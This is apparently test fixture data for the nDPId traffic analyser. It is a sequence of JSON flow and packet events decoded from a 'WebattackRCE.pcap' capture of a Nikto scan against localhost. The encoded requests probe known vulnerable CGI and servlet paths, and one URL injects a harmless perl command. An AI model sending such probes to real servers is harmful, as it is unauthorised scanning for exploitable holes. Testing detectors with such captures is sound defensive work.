+00683{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":517,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":517,"flow_packet_id":1,"flow_last_seen":1576420277505,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":219,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":219,"pkt_l4_len":185,"thread_ts_msec":1576420277505,"pkt":"AAAAAAAAAAAAAAAACABFAADNh+tAAEAGtD1\/AAABfwAAAcWkH5AZpL8K5\/crh4AYAED+wQAAAQEICp1m\/imdZv4oR0VUIC9ndWVzdGJvb2svZ3Vlc3Rib29rLmh0bWwgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDAwNzEpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} +01071{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":517,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":517,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277505,"flow_last_seen":1576420277505,"flow_idle_time":7560000,"flow_min_l4_payload_len":153,"flow_max_l4_payload_len":153,"flow_tot_l4_payload_len":153,"flow_avg_l4_payload_len":153,"midstream":1,"thread_ts_msec":1576420277505,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50596,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": 
{"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/guestbook\/guestbook.html","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000071)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":518,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":518,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277506,"flow_last_seen":1576420277506,"flow_idle_time":7560000,"flow_min_l4_payload_len":158,"flow_max_l4_payload_len":158,"flow_tot_l4_payload_len":158,"flow_avg_l4_payload_len":158,"midstream":1,"thread_ts_msec":1576420277506,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50598,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00690{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":518,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":518,"flow_packet_id":1,"flow_last_seen":1576420277506,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":224,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":224,"pkt_l4_len":190,"thread_ts_msec":1576420277506,"pkt":"AAAAAAAAAAAAAAAACABFAADSOPFAAEAGAzN\/AAABfwAAAcWmH5AZrAAQDbKHy4AYAED+xgAAAQEICp1m\/iqdZv4qR0VUIC9odG1sL2NnaS1iaW4vY2dpY3NvP3F1ZXJ5PUFBQSBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAwMDcyKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} 
+01077{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":518,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":518,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277506,"flow_last_seen":1576420277506,"flow_idle_time":7560000,"flow_min_l4_payload_len":158,"flow_max_l4_payload_len":158,"flow_tot_l4_payload_len":158,"flow_avg_l4_payload_len":158,"midstream":1,"thread_ts_msec":1576420277506,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50598,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/html\/cgi-bin\/cgicso?query=AAA","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000072)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":519,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":519,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277509,"flow_last_seen":1576420277509,"flow_idle_time":7560000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420277509,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50600,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":519,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":519,"flow_packet_id":1,"flow_last_seen":1576420277509,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":212,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":212,"pkt_l4_len":178,"thread_ts_msec":1576420277509,"pkt":"AAAAAAAAAAAAAAAACABFAADGjRRAAEAGrxt\/AAABfwAAAcWoH5A27bX0CottMYAYAED+ugAAAQEICp1m\/i2dZv4sR0VUIC9iYi1kbmJkL2ZheHN1cnZleSBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMDE0MikNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01064{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":519,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":519,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277509,"flow_last_seen":1576420277509,"flow_idle_time":7560000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420277509,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50600,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/bb-dnbd\/faxsurvey","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000142)"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":520,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":520,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277510,"flow_last_seen":1576420277510,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277510,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50602,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":520,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":520,"flow_packet_id":1,"flow_last_seen":1576420277510,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277510,"pkt":"AAAAAAAAAAAAAAAACABFAADBP59AAEAG\/JV\/AAABfwAAAcWqH5D7oQd9r6h8pYAYAED+tQAAAQEICp1m\/i6dZv4uR0VUIC9jYXJ0Y2FydC5jZ2kgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDAxNDMpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} +01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":520,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":520,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277510,"flow_last_seen":1576420277510,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277510,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50602,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric 
IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cartcart.cgi","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000143)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":521,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":521,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277512,"flow_last_seen":1576420277512,"flow_idle_time":7560000,"flow_min_l4_payload_len":156,"flow_max_l4_payload_len":156,"flow_tot_l4_payload_len":156,"flow_avg_l4_payload_len":156,"midstream":1,"thread_ts_msec":1576420277512,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50604,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00686{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":521,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":521,"flow_packet_id":1,"flow_last_seen":1576420277512,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":222,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":222,"pkt_l4_len":188,"thread_ts_msec":1576420277512,"pkt":"AAAAAAAAAAAAAAAACABFAADQQ2ZAAEAG+L9\/AAABfwAAAcWsH5AIFXuH0ihJCIAYAED+xAAAAQEICp1m\/i+dZv4vR0VUIC9zY3JpcHRzL0NhcmVsbG8vQ2FyZWxsby5kbGwgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDAxNDQpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} 
+01075{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":521,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":521,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277512,"flow_last_seen":1576420277512,"flow_idle_time":7560000,"flow_min_l4_payload_len":156,"flow_max_l4_payload_len":156,"flow_tot_l4_payload_len":156,"flow_avg_l4_payload_len":156,"midstream":1,"thread_ts_msec":1576420277512,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50604,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/scripts\/Carello\/Carello.dll","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000144)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":522,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":522,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277513,"flow_last_seen":1576420277513,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277513,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50606,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":522,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":522,"flow_packet_id":1,"flow_last_seen":1576420277513,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277513,"pkt":"AAAAAAAAAAAAAAAACABFAAC9L\/9AAEAGDDp\/AAABfwAAAcWuH5CdEhcgbNGBkoAYAED+sQAAAQEICp1m\/jGdZv4xR0VUIC93LWFnb3JhLyBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMDE4MykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":522,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":522,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277513,"flow_last_seen":1576420277513,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277513,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50606,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/w-agora\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000183)"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":523,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":523,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277515,"flow_last_seen":1576420277515,"flow_idle_time":7560000,"flow_min_l4_payload_len":168,"flow_max_l4_payload_len":168,"flow_tot_l4_payload_len":168,"flow_avg_l4_payload_len":168,"midstream":1,"thread_ts_msec":1576420277515,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50608,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00702{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":523,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":523,"flow_packet_id":1,"flow_last_seen":1576420277515,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":234,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":234,"pkt_l4_len":200,"thread_ts_msec":1576420277515,"pkt":"AAAAAAAAAAAAAAAACABFAADcMJVAAEAGC4V\/AAABfwAAAcWwH5AAUQhya1uvboAYAED+0AAAAQEICp1m\/jOdZv4zR0VUIC9jZ2ktbG9jYWwvY2dpZW1haWwtMS42L2NnaWNzbz9xdWVyeT1BQUEgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDAzNDQpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} +01087{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":523,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":523,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277515,"flow_last_seen":1576420277515,"flow_idle_time":7560000,"flow_min_l4_payload_len":168,"flow_max_l4_payload_len":168,"flow_tot_l4_payload_len":168,"flow_avg_l4_payload_len":168,"midstream":1,"thread_ts_msec":1576420277515,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50608,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": 
{"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi-local\/cgiemail-1.6\/cgicso?query=AAA","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000344)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":524,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":524,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277516,"flow_last_seen":1576420277516,"flow_idle_time":7560000,"flow_min_l4_payload_len":154,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":154,"midstream":1,"thread_ts_msec":1576420277516,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50610,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00686{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":524,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":524,"flow_packet_id":1,"flow_last_seen":1576420277516,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":220,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":220,"pkt_l4_len":186,"thread_ts_msec":1576420277516,"pkt":"AAAAAAAAAAAAAAAACABFAADO6rNAAEAGUXR\/AAABfwAAAcWyH5BduNJTZLl5JoAYAED+wgAAAQEICp1m\/jSdZv40R0VUIC9zZXJ2bGV0L1NjaGVkdWxlclRyYW5zZmVyIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDAzNDUpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} 
+01072{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":524,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":524,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277516,"flow_last_seen":1576420277516,"flow_idle_time":7560000,"flow_min_l4_payload_len":154,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":154,"midstream":1,"thread_ts_msec":1576420277516,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50610,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/servlet\/SchedulerTransfer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000345)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":525,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":525,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277518,"flow_last_seen":1576420277518,"flow_idle_time":7560000,"flow_min_l4_payload_len":162,"flow_max_l4_payload_len":162,"flow_tot_l4_payload_len":162,"flow_avg_l4_payload_len":162,"midstream":1,"thread_ts_msec":1576420277518,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50612,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00694{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":525,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":525,"flow_packet_id":1,"flow_last_seen":1576420277518,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":228,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":228,"pkt_l4_len":194,"thread_ts_msec":1576420277518,"pkt":"AAAAAAAAAAAAAAAACABFAADWgsZAAEAGuVl\/AAABfwAAAcW0H5A6eLoo9CriDoAYAED+ygAAAQEICp1m\/jWdZv41R0VUIC9zZXJ2bGV0L3N1bmV4YW1wbGVzLkJCb2FyZFNlcnZsZXQgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMDM0NikNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} +01080{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":525,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":525,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277518,"flow_last_seen":1576420277518,"flow_idle_time":7560000,"flow_min_l4_payload_len":162,"flow_max_l4_payload_len":162,"flow_tot_l4_payload_len":162,"flow_avg_l4_payload_len":162,"midstream":1,"thread_ts_msec":1576420277518,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50612,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/servlet\/sunexamples.BBoardServlet","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000346)"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":526,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":526,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277519,"flow_last_seen":1576420277519,"flow_idle_time":7560000,"flow_min_l4_payload_len":155,"flow_max_l4_payload_len":155,"flow_tot_l4_payload_len":155,"flow_avg_l4_payload_len":155,"midstream":1,"thread_ts_msec":1576420277519,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50614,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00687{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":526,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":526,"flow_packet_id":1,"flow_last_seen":1576420277519,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":221,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":221,"pkt_l4_len":187,"thread_ts_msec":1576420277519,"pkt":"AAAAAAAAAAAAAAAACABFAADPVxFAAEAG5RV\/AAABfwAAAcW2H5BSXG\/tRc4oyoAYAED+wwAAAQEICp1m\/jedZv43R0VUIC9zZXJ2bGV0cy9TY2hlZHVsZXJUcmFuc2ZlciBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMDM0NykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01073{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":526,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":526,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277519,"flow_last_seen":1576420277519,"flow_idle_time":7560000,"flow_min_l4_payload_len":155,"flow_max_l4_payload_len":155,"flow_tot_l4_payload_len":155,"flow_avg_l4_payload_len":155,"midstream":1,"thread_ts_msec":1576420277519,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50614,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": 
{"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/servlets\/SchedulerTransfer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000347)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":527,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":527,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277520,"flow_last_seen":1576420277520,"flow_idle_time":7560000,"flow_min_l4_payload_len":152,"flow_max_l4_payload_len":152,"flow_tot_l4_payload_len":152,"flow_avg_l4_payload_len":152,"midstream":1,"thread_ts_msec":1576420277520,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50616,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00682{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":527,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":527,"flow_packet_id":1,"flow_last_seen":1576420277520,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":218,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":218,"pkt_l4_len":184,"thread_ts_msec":1576420277520,"pkt":"AAAAAAAAAAAAAAAACABFAADMFYpAAEAGJqB\/AAABfwAAAcW4H5AzUC1t6XmH4oAYAED+wAAAAQEICp1m\/jidZv44R0VUIC9wZXJsLy1lJTIwcHJpbnQlMjBIZWxsbyBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAwMzUyKQ0KDQo="} 
+01070{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":527,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":527,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277520,"flow_last_seen":1576420277520,"flow_idle_time":7560000,"flow_min_l4_payload_len":152,"flow_max_l4_payload_len":152,"flow_tot_l4_payload_len":152,"flow_avg_l4_payload_len":152,"midstream":1,"thread_ts_msec":1576420277520,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50616,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/perl\/-e%20print%20Hello","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000352)"}} 